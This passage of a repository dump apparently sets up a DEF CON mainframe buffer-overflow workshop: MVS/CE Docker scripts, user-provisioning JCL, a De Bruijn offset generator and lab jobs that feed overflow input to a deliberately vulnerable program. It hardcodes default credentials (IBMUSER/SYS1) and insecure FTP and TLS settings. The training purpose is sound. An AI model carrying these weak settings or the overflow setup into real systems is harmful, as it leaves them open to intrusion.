This step changes USERMAX to 32 in SYS1.PARMLIB(IKJTSO00) 171 | //* 172 | //ADDAPF EXEC PGM=IKJEFT01,REGION=1024K,DYNAMNBR=50 173 | //SYSPRINT DD SYSOUT=* 174 | //SYSTSPRT DD SYSOUT=* 175 | //SYSTERM DD SYSOUT=* 176 | //SYSTSIN DD * 177 | EDIT 'SYS1.PARMLIB(IKJTSO00)' DATA 178 | LIST 179 | TOP 180 | CHANGE /USERMAX=8, /USERMAX=32,/ 181 | LIST 182 | SAVE 183 | END 184 | -------------------------------------------------------------------------------- /matrix.txt: -------------------------------------------------------------------------------- 1 | __ 2 | /\ .-" / 3 | / ; .' .' 4 | : :/ .' 5 | \ ;-.' 6 | .--""""--..__/ `. 7 | .' .' `o \ 8 | / ` ; 9 | : \ : 10 | .-; -. `.__.-' 11 | : ; \ , ; 12 | '._: ; : ( 13 | \/ .__ ; \ `-. 14 | ; "-,/_..--"`-..__) 15 | '""--.._: 16 | 17 | What is real. How do you define real? If you’re talking about what you 18 | can feel, what you can smell, what you can taste and see, then real is 19 | simply electrical signals interpreted by your brain. This is the world 20 | that you know. The world as it was at the end of the twentieth century 21 | 22 | It exists now only as part of a neural-interactive simulation that we 23 | call the Matrix. You've been living in a dream world, Neo. This is the 24 | world as it exists today... Welcome to the Desert of the Real. We have 25 | only bits and pieces of information but what we know for certain is 26 | that at some point in the early twenty-first century all of mankind 27 | was united in celebration. We marveled at our own magnificence as we 28 | gave birth to AI. 29 | 30 | A singular consciousness that spawned an entire race of machines. We 31 | don't know who struck first, us or them. But we know that it was us 32 | that scorched the sky. At the time they were dependent on solar power 33 | and it was believed that they would be unable to survive without an 34 | energy source as abundant as the sun. Throughout human history, we 35 | have been dependent on machines to survive. Fate it seems is not with- 36 | out a sense of irony. The human body generates more bio-electricity 37 | than a 120-volt battery and over 25,000 BTU's of body heat. Combined 38 | with a form of fusion the machines have found all the energy they would 39 | ever need. There are fields, endless fields, where human beings are no 40 | longer born, we are grown. For the longest time I wouldn't believe it, 41 | and then I saw the fields with my own eyes. Watch them liquefy the dead 42 | so they could be fed intravenously to the living. And standing there, 43 | facing the pure horrifying precision, I came to realize the obviousness 44 | of the truth. What is the Matrix? Control. The Matrix is a computer 45 | generated dream world built to keep us under control in order to change 46 | a human being into this. 47 | 48 | .-===-. 49 | | | 50 | | D C | 51 | | U E | 52 | | R L | 53 | | A L | 54 | | | 55 | '-----' 56 | 57 | -------------------------------------------------------------------------------- /motd.txt: -------------------------------------------------------------------------------- 1 | ******************************************************************************* 2 | * * 3 | * _/_/_/ _/_/_/_/ _/_/_/_/ _/_/_/ _/_/ _/ _/ * 4 | * _/ _/ _/ _/ _/ _/ _/ _/_/ _/ * 5 | * _/ _/ _/_/_/ _/_/_/ _/ _/ _/ _/ _/ _/ * 6 | * _/ _/ _/ _/ _/ _/ _/ _/ _/_/ * 7 | * _/_/_/ _/_/_/_/ _/ _/_/_/ _/_/ _/ _/ * 8 | * * 9 | * H O M 3 C 0 M I N G * 10 | * * 11 | ******************************************************************************* 12 | 13 | Type ISPF to access the editor. 14 | Type CALL '&SYSUID..LOAD(HELLO)' To Run the exploitable program 15 | 16 | ******************************************************************************* -------------------------------------------------------------------------------- /mvs.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # This script will copy the config file, edit it and move dasd 3 | # to the /config and /dasd volume if they don't already exist 4 | # Then it will boot MVS/CE 5 | 6 | # Does the hercules config file exist? 7 | # If not, copy the config from MVS/CE 8 | # and replace the folder location with 9 | # volume names 10 | if [ ! -f /config/local.cnf ]; then 11 | echo "[*] /config/local.cnf does not exist... generating" 12 | sed 's_DASD/_/dasd/_g' MVSCE/conf/local.cnf > /config/local.cnf 13 | sed -i 's_punchcards/_/punchcards/_g' /config/local.cnf 14 | sed -i 's_printers/_/printers/_g' /config/local.cnf 15 | sed -i 's_mvslog.txt_/logs/mvslog.txt_g' /config/local.cnf 16 | sed -i 's_localhost_0.0.0.0_g' /config/local.cnf 17 | sed -i 's_localhost_0.0.0.0_g' /config/local.cnf 18 | sed -i 's_conf/local/_/config/local/_g' /config/local.cnf 19 | echo "" >> /config/local.cnf 20 | echo "#################################" >> /config/local.cnf 21 | echo "# Adding HTTP server for Docker" >> /config/local.cnf 22 | echo 'HTTP PORT 8888 AUTH ${HUSER:=hercules} ${HPASS:=hercules}' >> /config/local.cnf 23 | echo "HTTP START" >> /config/local.cnf 24 | fi 25 | 26 | if [ ! -f /config/local/custom.cnf ]; then 27 | echo "[*] /config/local/custom.cnf does not exist... generating" 28 | mkdir -p /config/local/ 29 | sed 's_conf/local/_/config/local/_g' MVSCE/conf/local/custom.cnf > /config/local/custom.cnf 30 | fi 31 | 32 | for conf in MVSCE/conf/local/*; do 33 | if cmp -s "$conf" "/config/local/$(basename $conf)" ; then 34 | echo "[*] /config/local/$(basename $conf) no changes" 35 | else 36 | # Check which file is newer 37 | if [ "$conf" -nt "/config/local/$(basename $conf)" ]; then 38 | # backup the previous config if it exists 39 | cp "/config/local/$(basename $conf)" "/config/local/$(basename $conf).bak" 2>/dev/null 40 | cp "$conf" "/config/local/$(basename $conf)" 41 | sed 's_conf/local/_/config/local/_g' -i "/config/local/$(basename $conf)" 42 | # check to make sure the config exists in custom.cnf 43 | if $(grep -L "/config/local/$(basename $conf)" /config/local/custom.cnf) ; then 44 | # if not then we add it 45 | echo "INCLUDE /config/local/$(basename $conf)" >> /config/local/custom.cnf 46 | fi 47 | fi 48 | fi 49 | done 50 | 51 | 52 | 53 | for disk in MVSCE/DASD/*; do 54 | if [ ! -f /dasd/$(basename $disk) ]; then 55 | echo "[*] Copying $disk" 56 | cp -v $disk /dasd/ 57 | fi 58 | done 59 | 60 | if [ ! -f /certs/ftp.pem ]; then 61 | echo "[*] /certs/ftp.pem does not exist... generating" 62 | openssl req -x509 -nodes -days 365 \ 63 | -subj "/C=CA/ST=QC/O=FTPD Inc/CN=hercules.ftp" \ 64 | -newkey rsa:2048 -keyout /certs/ftp.key \ 65 | -out /certs/ftp.crt 66 | cat /certs/ftp.key /certs/ftp.crt > /certs/ftp.pem 67 | 68 | fi 69 | 70 | if [ ! -f /certs/ca.key ]; then 71 | echo "[*] /certs/ca.key (for web3270) does not exist... generating" 72 | openssl req -x509 -nodes -days 365 \ 73 | -subj "/C=CA/ST=QC/O=web3270 Inc/CN=3270.web" \ 74 | -newkey rsa:2048 -keyout /certs/ca.key \ 75 | -out /certs/ca.csr 76 | fi 77 | 78 | if [ ! -f /certs/3270.pem ]; then 79 | echo "[*] /certs/3270.pem does not exist... generating" 80 | openssl req -x509 -nodes -days 365 \ 81 | -subj "/C=CA/ST=QC/O=TN3270 Inc/CN=hercules.3270" \ 82 | -newkey rsa:2048 -keyout /certs/3270.key \ 83 | -out /certs/3270.crt 84 | cat /certs/3270.key /certs/3270.crt > /certs/3270.pem 85 | 86 | fi 87 | 88 | echo "[*] Starting encrypted FTP listener on port 3221" 89 | ( socat openssl-listen:3221,cert=/certs/ftp.pem,verify=0,reuseaddr,fork tcp4:127.0.0.1:2121 ) & 90 | echo "[*] Starting encrypted TN3270 listener on port 3223" 91 | ( socat openssl-listen:3223,cert=/certs/3270.pem,verify=0,reuseaddr,fork tcp4:127.0.0.1:3270 ) & 92 | 93 | echo "[*] Starting Wiki" 94 | /usr/local/bin/start_tiddlywiki & 95 | 96 | echo "[*] Launching web3270" 97 | cd /web3270 98 | python3 -u /web3270/server.py --config /config --certs /certs & 99 | cd /MVSCE 100 | echo "[*] Starting Hercules" 101 | hercules -f /config/local.cnf -r conf/mvsce.rc --daemon > /logs/hercules.log -------------------------------------------------------------------------------- /overflows/LGBT400: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/overflows/LGBT400 -------------------------------------------------------------------------------- /overflows/LOC400: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/overflows/LOC400 -------------------------------------------------------------------------------- /overflows/WTO400: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/overflows/WTO400 -------------------------------------------------------------------------------- /rexx/DEBRUIJN.rex: -------------------------------------------------------------------------------- 1 | /* REXX */ 2 | /* Simplistic De Brujin pattern generator in REXX */ 3 | /* SYNTAX: BRUJIN */ 4 | /* Author: davide girardi */ 5 | /* https://github.com/davidegirardi */ 6 | parse arg len 7 | /* Alphabets */ 8 | if len = '' then do 9 | say "Missing argument length usage: DEBRUIJN " 10 | exit 11 | end 12 | UPPERCASE = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" 13 | LOWERCASE = "abcdefghijklmnopqrstuvwxyz" 14 | ALLDIGITS = "1234567890" 15 | x = debruijn(len) 16 | say x 17 | exit 18 | debruijn: 19 | pattern = "" 20 | do u=1 to length(UPPERCASE) 21 | do l=1 to length(LOWERCASE) 22 | do d=1 to length(ALLDIGITS) 23 | if length(pattern) < len then 24 | do 25 | ucase = substr(UPPERCASE, u, 1) 26 | lower = substr(LOWERCASE, l, 1) 27 | digit = substr(ALLDIGITS, d, 1) 28 | pattern = pattern || ucase || lower || digit 29 | end 30 | end 31 | end 32 | end 33 | return substr(pattern, 1, len) 34 | -------------------------------------------------------------------------------- /screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/screenshot.png -------------------------------------------------------------------------------- /upload.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | ## requires git clone https://github.com/jake-mainframe/ARBAUTH 4 | 5 | # This will create DEFCON.* datasets 6 | # Replaced the LOGON clist with motd.txt 7 | # Adds users DC01 through DC30 to RAKF 8 | 9 | import sys 10 | import math 11 | from pathlib import Path 12 | 13 | # Takes in a CLIST and splits the text on each line 14 | 15 | if len(sys.argv) < 2: 16 | print("Missing argument\n Usage: {} motd.txt".format(sys.argv[0])) 17 | sys.exit() 18 | 19 | MOTDJCL = '''//UPLOAD JOB (JOB),'MOTD', 20 | // CLASS=A,MSGLEVEL=(1,1),MSGCLASS=A, 21 | // NOTIFY=IBMUSER,USER=IBMUSER,PASSWORD=SYS1 22 | //* 23 | //* This JCL was generated with upload.py use that dont edit this 24 | //* 25 | //MOTDPROC EXEC PGM=IEBUPDTE,PARM=NEW 26 | //SYSPRINT DD SYSOUT=* 27 | //SYSUT2 DD DSN=SYS1.CMDPROC,DISP=SHR 28 | //SYSIN DD DATA,DLM='><' 29 | ./ ADD NAME=STDLOGON 30 | PROC 0 31 | CONTROL NOMSG,NOLIST,NOSYMLIST,NOCONLIST,NOFLUSH 32 | CLS 33 | {MOTD} 34 | REVINIT 35 | >< 36 | ''' 37 | 38 | upload_file = '''//* 39 | //* Adding DEFCON.OVERFLOW({member}) 40 | //* 41 | //CRTEOVRF EXEC PGM=IEBGENER 42 | //SYSUT2 DD DSN=DEFCON.OVERFLOW({member}),DISP=SHR 43 | //SYSPRINT DD SYSOUT=* 44 | //SYSIN DD DUMMY 45 | //SYSUT1 DD DATA,DLM='{dlm}' 46 | ::E {filename} 47 | {dlm} 48 | ''' 49 | 50 | replace_ispf_clist = '''//* 51 | //* Replace the ISPF clist to get rid of annoying "FREE" messages 52 | //* 53 | //ISPFPROC EXEC PGM=IEBUPDTE,PARM=NEW 54 | //SYSPRINT DD SYSOUT=* 55 | //SYSUT2 DD DSN=SYS1.CMDPROC,DISP=SHR 56 | //SYSIN DD DATA,DLM='><' 57 | ./ ADD NAME=ISPF 58 | PROC 0 59 | /* ALLOCATE REQUIRED ISPF DD NAMES */ 60 | ALLOC F(ISPCLIB) DA('SYSGEN.ISPF.CLIB','SYSGEN.REVIEW.CLIST') SHR 61 | ALLOC F(ISPLLIB) DA('SYSGEN.ISPF.LLIB','SYSGEN.REVIEW.LOAD') SHR 62 | ALLOC F(ISPMLIB) DA('SYSGEN.ISPF.MLIB') SHR 63 | ALLOC F(ISPPLIB) DA('SYSGEN.ISPF.PLIB','SYSGEN.ISPF.RFEPLIB') SHR 64 | ALLOC F(ISPSLIB) DA('SYSGEN.ISPF.SLIB') SHR 65 | ALLOC F(ISPTABL) DA('SYSGEN.ISPF.TLIB') SHR 66 | ALLOC F(ISPTLIB) DA('SYSGEN.ISPF.TLIB') SHR 67 | /* CREATE USERID.ISP.PROF IF IT DOES NOT EXIST */ 68 | IF &SYSDSN('&SYSUID..ISP.PROF') NE &STR(OK) THEN DO 69 | /* CREATE THE DCB INFO */ 70 | ATTRIB PROFS BLKSIZE(3120) LRECL(80) DSORG(PO) RECFM(F,B) 71 | /* ALLOCATE THE DATASET */ 72 | ALLOC DSNAME('&SYSUID..ISP.PROF') CYLINDERS SPACE(1,0) DIR(10) + 73 | VOLUME(PUB001) UNIT(3390) USING(PROFS) NEW 74 | /* FREE THE DCB INFO */ 75 | FREE ATTRLIST(PROFS) 76 | END 77 | /* ALLOCATE USER PROFILES */ 78 | ALLOC F(ISPPROF) DA('&SYSUID..ISP.PROF') SHR 79 | ALLOC F(REVPROF) DA('&SYSUID..ISP.PROF') SHR 80 | /* LAUNCH ISPF */ 81 | CALL 'SYSGEN.ISPF.LLIB(ISPF)' 82 | FREE F(ISPCLIB,ISPLLIB,ISPMLIB,ISPPLIB,ISPSLIB,ISPTABL,ISPTLIB) 83 | FREE F(ISPPROF,REVPROF) 84 | >< 85 | //* 86 | //* Replace COMMND00 with custom 87 | //* Replace FTPD PARMLIB 88 | //* 89 | //NEWCOMND EXEC PGM=IEBUPDTE,PARM=NEW 90 | //SYSUT2 DD DSN=SYS1.PARMLIB,DISP=OLD 91 | //SYSPRINT DD SYSOUT=* 92 | //SYSIN DD * 93 | ./ ADD NAME=COMMND00,LIST=ALL 94 | ./ NUMBER NEW1=10,INCR=10 95 | COM='SEND 'AUTO COMMANDS IN COMMND00 BEING PROCESSED',CN=01' 96 | COM='START JES2,,,PARM='WARM,NOREQ'' 97 | COM='START SETPFKEY,M=00' 98 | COM='START FTPDDC30' 99 | COM='START NET' 100 | ./ ADD NAME=FTPDPM00,LIST=ALL 101 | SRVPORT=2121 102 | SRVIP=ANY 103 | PASVADR=127,0,0,1 104 | PASVPORTS=31337-31347 105 | INSECURE=1 106 | AUTHUSER=IBMUSER 107 | PUB000,3380 PUBLIC DATASETS (PRIVATE) 108 | ./ ENDUP 109 | ''' 110 | 111 | sources = '''//* 112 | //* Adds sources to DEFCON.source 113 | //* 114 | //SOURCES EXEC PGM=IEBUPDTE,REGION=1024K,PARM=NEW 115 | //SYSPRINT DD SYSOUT=* 116 | //SYSUT2 DD DSN=DEFCON.SOURCE,DISP=SHR 117 | //SYSIN DD DATA,DLM=$$ 118 | {sources} 119 | $$ 120 | ''' 121 | 122 | execs = '''//* 123 | //* Adds REXX scripts to DEFCON.EXEC 124 | //* 125 | //REXXEXEC EXEC PGM=IEBUPDTE,REGION=1024K,PARM=NEW 126 | //SYSPRINT DD SYSOUT=* 127 | //SYSUT2 DD DSN=DEFCON.EXEC,DISP=SHR 128 | //SYSIN DD DATA,DLM=$$ 129 | {execs} 130 | $$ 131 | ''' 132 | 133 | easteregg = '''//* 134 | //* Adds Easter Eggs 135 | //* 136 | //EASTER EXEC PGM=IEBUPDTE,REGION=1024K,PARM=NEW 137 | //SYSPRINT DD SYSOUT=* 138 | //SYSUT2 DD DSN=WHITE.RABBIT,DISP=SHR 139 | //SYSIN DD DATA,DLM=$$ 140 | {sources} 141 | $$ 142 | ''' 143 | 144 | hint = "./ ADD NAME=EASTREGG,LIST=ALL\nDid you follow the WHITE.RABBIT?" 145 | 146 | def upload_rdrprep_file(filename,member=False,dlm="><"): 147 | '''Uses rdrprep to upload a Binary file''' 148 | if not member: 149 | member = filename.split(".")[0].upper() 150 | if "/" in member: 151 | member = member.split("/")[-1] 152 | upload_file_jcl = upload_file.format(filename=filename,member=member,dlm=dlm) 153 | return upload_file_jcl 154 | 155 | # Creates JCL to upload OVERFLOW files 156 | jcl = '' 157 | 158 | print("*** Generating MOTD") 159 | motd = '' 160 | with open(sys.argv[1],'r') as motd_text_file: 161 | for line in motd_text_file: 162 | l = len(line.rstrip()) 163 | if l >= 80: 164 | # the line is too long, truncating 165 | l = 79 166 | line = line.rstrip()[:l] 167 | first_half = line.rstrip()[:math.floor(l/2)] 168 | second_half = line.rstrip()[math.floor(l/2):] 169 | motd += "WRITE {first}-\n{second}\n".format(first=first_half,second=second_half) 170 | 171 | jcl = MOTDJCL.format(MOTD=motd) 172 | 173 | create_pds = '''//* 174 | //* Create PDS to hold overflows 175 | //* 176 | //CREATEOF EXEC PGM=IEFBR14 177 | //OVERFLOW DD DSN=DEFCON.OVERFLOW,DISP=(NEW,CATLG), 178 | // UNIT=SYSDA,VOL=SER=PUB000, 179 | // SPACE=(TRK,(3,3,3),RLSE), 180 | // DCB=(DSORG=PS,RECFM=FB,LRECL=400,BLKSIZE=400) 181 | //ARBAUTH DD DSN=DEFCON.OVERFLOW.ARBAUTH,DISP=(NEW,CATLG), 182 | // UNIT=SYSDA,VOL=SER=PUB000, 183 | // SPACE=(TRK,(3,3,3),RLSE), 184 | // DCB=(DSORG=PS,RECFM=FB,LRECL=30000,BLKSIZE=30000) 185 | //SOURCE DD DSN=DEFCON.SOURCE,DISP=(NEW,CATLG), 186 | // UNIT=SYSDA,VOL=SER=PUB000, 187 | // SPACE=(TRK,(3,3,3),RLSE),DCB=SYS1.MACLIB 188 | //EXEC DD DSN=DEFCON.EXEC,DISP=(NEW,CATLG), 189 | // UNIT=SYSDA,VOL=SER=PUB000, 190 | // SPACE=(TRK,(3,3,3),RLSE),DCB=SYS2.EXEC 191 | //WHTERABT DD DSN=WHITE.RABBIT,DISP=(NEW,CATLG), 192 | // UNIT=SYSDA,VOL=SER=PUB000, 193 | // SPACE=(TRK,(3,3,3),RLSE),DCB=SYS1.MACLIB 194 | //FTPDDUMP DD DSN=DEFCON.FTPDDUMP,DISP=(NEW,CATLG), 195 | // UNIT=SYSDA,VOL=SER=PUB000, 196 | // SPACE=(TRK,(10,5),RLSE), 197 | // DCB=(DSORG=PS,RECFM=FB,LRECL=121,BLKSIZE=400) 198 | ''' 199 | 200 | 201 | # These dont work cause cards are max 80 cars, use FTP instead: 202 | # for i in overflows/*; do lftp -e "cd DEFCON.OVERFLOW; put $i; bye" -u ibmuser,sys1 localhost:2121; done 203 | # create_pds += upload_rdrprep_file("overflows/LGBT400") 204 | # create_pds += upload_rdrprep_file("overflows/LOC400") 205 | # create_pds += upload_rdrprep_file("overflows/WTO400") 206 | # create_pds += upload_rdrprep_file("ARBAUTH/PATTERN") 207 | 208 | print("*** Creating DEFCON.OVERFLOW and DEFCON.SOURCE") 209 | 210 | 211 | jcl += create_pds 212 | 213 | print("*** Adding Source files ") 214 | 215 | with open("GETSPLOIT/hello.c", "r") as infile: 216 | hellosrc = "./ ADD NAME=HELLO,LIST=ALL\n{}".format( infile.read() ) 217 | 218 | with open("ARBAUTH/arbauth.jcl", "r") as infile: 219 | arbauthsrc = "./ ADD NAME=ARBAUTH,LIST=ALL\n{}".format( infile.read() ) 220 | 221 | jcl += sources.format(sources=hellosrc+arbauthsrc+hint) 222 | 223 | with open("matrix.txt", "r") as infile: 224 | jcl += easteregg.format( sources = "./ ADD NAME=SCRIPT,LIST=ALL\n{}".format( infile.read() ) ) 225 | 226 | print("*** Adding REXX execs ") 227 | 228 | p = Path("rexx/").glob('**/*') 229 | files = [x for x in p if x.is_file()] 230 | 231 | rx = '' 232 | for rexx_script in sorted(files): 233 | with open(rexx_script,"r") as rexx: 234 | rx += execs.format( 235 | execs="./ ADD NAME={},LIST=ALL\n".format(rexx_script.stem.split('.')[0].upper()) + 236 | rexx.read().rstrip() 237 | ) 238 | 239 | jcl += rx 240 | 241 | add_rakf_profiles = '''//* 242 | //* ADD RAKF PROFILES 243 | //* 244 | //ADDRAKFU EXEC PGM=SORT,REGION=512K,PARM='MSG=AP' 245 | //STEPLIB DD DSN=SYSC.LINKLIB,DISP=SHR 246 | //SYSOUT DD SYSOUT=A 247 | //SYSPRINT DD SYSOUT=A 248 | //SORTLIB DD DSNAME=SYSC.SORTLIB,DISP=SHR 249 | //SORTOUT DD DSN=SYS1.SECURE.CNTL(USERS),DISP=SHR 250 | //SORTWK01 DD UNIT=2314,SPACE=(CYL,(5,5)),VOL=SER=SORTW1 251 | //SORTWK02 DD UNIT=2314,SPACE=(CYL,(5,5)),VOL=SER=SORTW2 252 | //SORTWK03 DD UNIT=2314,SPACE=(CYL,(5,5)),VOL=SER=SORTW3 253 | //SORTWK04 DD UNIT=2314,SPACE=(CYL,(5,5)),VOL=SER=SORTW5 254 | //SORTWK05 DD UNIT=2314,SPACE=(CYL,(5,5)),VOL=SER=SORTW6 255 | //SYSIN DD * 256 | SORT FIELDS=(1,80,CH,A) 257 | RECORD TYPE=F,LENGTH=(80) 258 | END 259 | /* 260 | //SORTIN DD DSN=SYS1.SECURE.CNTL(USERS),DISP=SHR 261 | // DD DATA,DLM=@@ 262 | {users} 263 | @@ 264 | //* 265 | //* Update the RAKF database 266 | //* 267 | //RAKFUPDT EXEC RAKFUSER 268 | ''' 269 | 270 | print("*** Adding DC00 - DC30 RAKF") 271 | 272 | rakf_users = '' 273 | for x in range(0,30): 274 | rakf_users += ("{usern} USERS {usern} N\n".format(usern="DC{}".format(str(x).zfill(2)))) 275 | jcl += add_rakf_profiles.format(users=rakf_users[:-1]) 276 | 277 | jcl += replace_ispf_clist 278 | 279 | 280 | print("*** Adding ARBAUTH/arbauth.jcl ") 281 | with open("ARBAUTH/arbauth.jcl", "r") as infile: 282 | #ebcdic_jcl_to_upload += to_ebcdic(''.join(infile.readlines()[8:])) 283 | jcl += (''.join(infile.readlines()[8:])) 284 | 285 | 286 | print("*** Writting jcl/upload.jcl") 287 | with open("jcl/upload.jcl", "w") as outfile: 288 | outfile.write(jcl) 289 | 290 | -------------------------------------------------------------------------------- /usersjcl.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # This script was built for the DEFCON Class 3 | # Use the JCL below to provision staging dataset 4 | # Then upload LGBT400, LOC400, WTO400 to IT. 5 | # The JCL generated expects to use rdrprep to generate EBCDIC 6 | # Once you've compiled and prelinked hello.c run this script 7 | # convert the output jcl to ebcdic jcl with rdrprep and submit 8 | # then one at a time to the EBCDIC reader on port 3506: 9 | # for i in *.jcl; do echo $i;rdrprep $i;cat reader.jcl|ncat --send-only -w1 172.17.0.3 3506; read; done 10 | 11 | ## JCL to build staging PDS for overflows. 12 | # //CREATEOF EXEC PGM=IEFBR14 13 | # //OVERFLOW DD DSN=DEFCON.OVERFLOW,DISP=(NEW,CATLG), 14 | # // UNIT=SYSDA,VOL=SER=PUB000, 15 | # // SPACE=(TRK,(3,3,3),RLSE), 16 | # // DCB=(DSORG=PS,RECFM=FB,LRECL=400,BLKSIZE=400) 17 | # //ARBAUTH DD DSN=DEFCON.OVERFLOW.ARBAUTH,DISP=(NEW,CATLG), 18 | # // UNIT=SYSDA,VOL=SER=PUB000, 19 | # // SPACE=(TRK,(3,3,3),RLSE), 20 | # // DCB=(DSORG=PS,RECFM=FB,LRECL=30000,BLKSIZE=30000) 21 | # //SOURCE DD DSN=DEFCON.SOURCE,DISP=(NEW,CATLG), 22 | # // UNIT=SYSDA,VOL=SER=PUB000, 23 | # // SPACE=(TRK,(3,3,3),RLSE),DCB=SYS1.MACLIB 24 | # //EXEC DD DSN=DEFCON.EXEC,DISP=(NEW,CATLG), 25 | # // UNIT=SYSDA,VOL=SER=PUB000, 26 | # // SPACE=(TRK,(3,3,3),RLSE),DCB=SYS2.EXEC 27 | 28 | 29 | from pathlib import Path 30 | 31 | 32 | # This job does all the magic 33 | USERJOB = ('''//{usern} JOB (1),'ADD {usern}',CLASS=S,MSGLEVEL=(1,1), 34 | // MSGCLASS=A,USER=IBMUSER,PASSWORD=SYS1,NOTIFY=IBMUSER 35 | // EXEC TSONUSER,ID={usern}, 36 | // PW='{usern}', 37 | // PR='IKJACCNT', 38 | // OP='NOOPER', 39 | // AC='NOACCT', 40 | // JC='JCL', 41 | // MT='NOMOUNT' 42 | //STEP01 EXEC PGM=IEFBR14 43 | //OVERFLOW DD DSN={usern}.OVERFLOW,DISP=(NEW,CATLG), 44 | // UNIT=SYSDA,VOL=SER=PUB000, 45 | // SPACE=(TRK,(3,3,3),RLSE), 46 | // DCB=DEFCON.OVERFLOW 47 | //ARBAUTH DD DSN={usern}.OVERFLOW.ARBAUTH,DISP=(NEW,CATLG), 48 | // UNIT=SYSDA,VOL=SER=PUB000, 49 | // SPACE=(TRK,(3,3,3),RLSE), 50 | // DCB=DEFCON.OVERFLOW.ARBAUTH 51 | //DUMP001 DD DSN={usern}.DUMP001,DISP=(NEW,CATLG), 52 | // UNIT=SYSDA,VOL=SER=PUB000, 53 | // SPACE=(TRK,(10,5),RLSE), 54 | // DCB=(DSORG=PS,RECFM=FB,LRECL=121,BLKSIZE=400) 55 | //DUMP002 DD DSN={usern}.DUMP002,DISP=(NEW,CATLG), 56 | // UNIT=SYSDA,VOL=SER=PUB000, 57 | // SPACE=(TRK,(10,5),RLSE), 58 | // DCB=(DSORG=PS,RECFM=FB,LRECL=121,BLKSIZE=400) 59 | //DUMP003 DD DSN={usern}.DUMP003,DISP=(NEW,CATLG), 60 | // UNIT=SYSDA,VOL=SER=PUB000, 61 | // SPACE=(TRK,(10,5),RLSE), 62 | // DCB=(DSORG=PS,RECFM=FB,LRECL=121,BLKSIZE=400) 63 | //DUMP004 DD DSN={usern}.DUMP004,DISP=(NEW,CATLG), 64 | // UNIT=SYSDA,VOL=SER=PUB000, 65 | // SPACE=(TRK,(10,5),RLSE), 66 | // DCB=(DSORG=PS,RECFM=FB,LRECL=121,BLKSIZE=400) 67 | //JCLLIB DD DSN={usern}.JCLLIB,DISP=(NEW,CATLG), 68 | // UNIT=SYSDA,VOL=SER=PUB000, 69 | // SPACE=(CYL,(1,1,20)),DCB=SYS1.MACLIB 70 | //* COPY ALL MEMBERS FROM ONE PDS TO ANOTHER 71 | //COPYTHEM EXEC PGM=IEBCOPY 72 | //SYSPRINT DD SYSOUT=* 73 | //* SYSUT1 is source SYSUT2 is destination 74 | //SYSUT1 DD DSN=DEFCON.OVERFLOW,DISP=SHR 75 | //SYSUT2 DD DSN={usern}.OVERFLOW,DISP=SHR 76 | //SYSIN DD DUMMY 77 | //* 78 | //* COPY ALL MEMBERS FROM ONE PDS TO ANOTHER 79 | //* 80 | //COPYOVRF EXEC PGM=IEBCOPY 81 | //SYSPRINT DD SYSOUT=* 82 | //* SYSUT1 is source SYSUT2 is destination 83 | //SYSUT1 DD DSN=DEFCON.OVERFLOW,DISP=SHR 84 | //SYSUT2 DD DSN={usern}.OVERFLOW,DISP=SHR 85 | //SYSIN DD DUMMY 86 | //* 87 | //* 88 | //* COPY ALL MEMBERS FROM ONE PDS TO ANOTHER 89 | //* 90 | //COPYOVRF EXEC PGM=IEBCOPY 91 | //SYSPRINT DD SYSOUT=* 92 | //* SYSUT1 is source SYSUT2 is destination 93 | //SYSUT1 DD DSN=DEFCON.OVERFLOW.ARBAUTH,DISP=SHR 94 | //SYSUT2 DD DSN={usern}.OVERFLOW.ARBAUTH,DISP=SHR 95 | //SYSIN DD DUMMY 96 | //* 97 | //COPYSRC EXEC PGM=IEBCOPY 98 | //SYSPRINT DD SYSOUT=* 99 | //* SYSUT1 is source SYSUT2 is destination 100 | //SYSUT1 DD DSN=DEFCON.SOURCE,DISP=SHR 101 | //SYSUT2 DD DSN={usern}.SOURCE,DISP=SHR 102 | //SYSIN DD DUMMY 103 | //* 104 | //COPYEXEC EXEC PGM=IEBCOPY 105 | //SYSPRINT DD SYSOUT=* 106 | //* SYSUT1 is source SYSUT2 is destination 107 | //SYSUT1 DD DSN=DEFCON.EXEC,DISP=SHR 108 | //SYSUT2 DD DSN={usern}.EXEC,DISP=SHR 109 | //SYSIN DD DUMMY 110 | //* 111 | //LINK EXEC PGM=IEWL,PARM='MAP,LIST,XREF,NORENT',REGION=1024K 112 | //SYSPRINT DD SYSOUT=A 113 | //SYSLMOD DD DISP=SHR,DSN={usern}.LOAD(HELLO) 114 | //SYSUT1 DD UNIT=SYSDA,SPACE=(CYL,(5,1)) 115 | //SYSLIN DD DATA,DLM=$$ 116 | ::E GETSPLOIT/hello.load 117 | $$ 118 | //* 119 | //STORE EXEC PGM=IEBUPDTE,REGION=1024K,PARM=NEW 120 | //SYSPRINT DD SYSOUT=* 121 | //SYSUT2 DD DSN={usern}.JCLLIB,DISP=SHR 122 | //SYSIN DD DATA,DLM=$$ 123 | ./ ADD NAME=LAB01,LIST=ALL 124 | //{usern}LAB1 JOB (TSO), 125 | // 'Normal Run', 126 | // CLASS=A, 127 | // MSGCLASS=H, 128 | // MSGLEVEL=(1,1),NOTIFY=&SYSUID 129 | //RUN EXEC PGM=HELLO,REGION=0M 130 | //SYSPRINT DD SYSOUT=* 131 | //STDOUT DD SYSOUT=* 132 | //STDIN DD * 133 | TESTRUN 134 | //* 135 | //STEPLIB DD DISP=SHR,DSN={usern}.LOAD 136 | ./ ADD NAME=LAB02,LIST=ALL 137 | //{usern}LAB2 JOB (TSO), 138 | // 'Crash Run', 139 | // CLASS=A, 140 | // MSGCLASS=H, 141 | // MSGLEVEL=(1,1),NOTIFY=&SYSUID 142 | //RUN EXEC PGM=HELLO,REGION=0M 143 | //SYSPRINT DD SYSOUT=* 144 | //STDOUT DD SYSOUT=A 145 | //STDIN DD DISP=SHR,DSN={usern}.OVERFLOW(LGBT400) 146 | //STEPLIB 